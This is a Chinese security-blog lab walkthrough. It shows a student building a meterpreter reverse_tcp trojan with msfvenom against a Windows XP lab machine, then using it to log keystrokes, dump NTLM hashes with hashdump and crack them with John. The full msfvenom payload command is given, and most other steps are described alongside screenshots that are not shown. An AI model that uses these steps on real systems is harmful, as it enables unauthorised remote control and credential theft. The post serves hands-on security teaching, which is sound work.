freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

使用Msfvenom生成木马并控制靶机的实验
mingyeqf 2021-05-23 16:40:36 184693

*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

实施用户密码破解

一、环境配置(两台主机均采用NAT桥接模式)

1、Kali主机的IP配置:(211.100.71.10/24 )

1621758738_60aa131270b520f155b93.png!small


2、winxp主机的IP配置:

1621758741_60aa1315a576341c63b7f.png!small

(211.100.71.14/24 )

二、远程控制计算机

1、利用msfvenom工具生成一个木马控制端—shell.exe,并把该木马程序保存到root用户下(lhost要改成kali的IP,lport要改为自己手机尾数后四位,shell.exe改为姓名拼音小写首字母.exe)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22  lport=1211 -f exe > /root/shell.exe
1621758808_60aa1358955ec5341a748.png!small

1621758820_60aa1364b3c5e9c6e6ab1.png!small

2、将shell.exe文件拷贝到WINXP的桌面上

1621758863_60aa138f336e49bc7f016.png!small

3、启用MSF攻击平台

1621758872_60aa1398730588bae45dc.png!small

4、加载模块和选择Payload

1621758890_60aa13aa3c47f1a5ffa7b.png!small

5、设置Payload参数

1621758896_60aa13b06ba9b5db4df12.png!small

6、双击执行WINXP主机上的shell.exe文件

7、在kali上实施渗透攻击

1621758901_60aa13b5002d1409266ae.png!small1621758917_60aa13c536ebdd1da2b62.png!small

1621758957_60aa13ed0ca143390d863.png!small

8、在kali上实施键盘记录

1)输入如下命令启用键盘记录功能

1621758967_60aa13f7742b5736d6d55.png!small

2)在windows xp2CMD.exe环境下输入命令

1621758971_60aa13fb32e29d3397ae9.png!small

3)在kali上打开键盘记录文件,可以看到文件中记录下来在windows xp2中输入的内容。

1621758985_60aa1409d9fd5821392db.png!small

9、用john(密码破解工具)破解windows xp2在任务1创建的用户(即自己姓名的拼音小写首字母)密码,实验中用户名为:zs ,密码为:police (选一个密码词典password.lst中的密码,作为登录密码)

(1)将用于破解的密码词典password.lst文件拷贝到root用户目录下

1621759005_60aa141dd43a2e8dd8c11.png!small1621759009_60aa14210fe5d538a8f83.png!small

2)在kali上用命令hashdump获取windows xp2的用户名及加密后的密码(NTLM hash值)

1621759013_60aa14252030d09549ed5.png!small

3将zs用户的密码NTLM hash值保存在xxx.hash(xxx为姓名的拼音小写首字母)文件中,并查看

1621759015_60aa1427ae2f3a1089d09.png!small

4)启用john的图形化界面1621759049_60aa1449e8d44d2ff332f.png!small

5)打开zs.hash文件进行破解

1621759054_60aa144e64804829b0aae.png!small1621759061_60aa14550f4c43353ae2e.png!small1621759068_60aa145c84cc384fdd482.png!small

6)选择要破解的密码加密算法和密码词典(password.lst1621759122_60aa14926c37dd585a870.png!small

7)开始破解密码

1621759127_60aa1497060b4857c6489.png!small

8)密码破解成功

1621759135_60aa149f709086a395ca1.png!small

最后

希望大家遵纪守法!一起加油哈哈

# 黑客 # 数据泄露 # web安全 # 数据安全 # 木马
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 mingyeqf 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
mingyeqf LV.4
这家伙太懒了,还未填写个人描述!
  • 7 文章数
  • 3 关注者
熊海cms——代码审计
2022-03-07
WEB漏洞-XXE&XML之利用检测
2021-06-16
一次钓鱼网站实验
2021-05-23
文章目录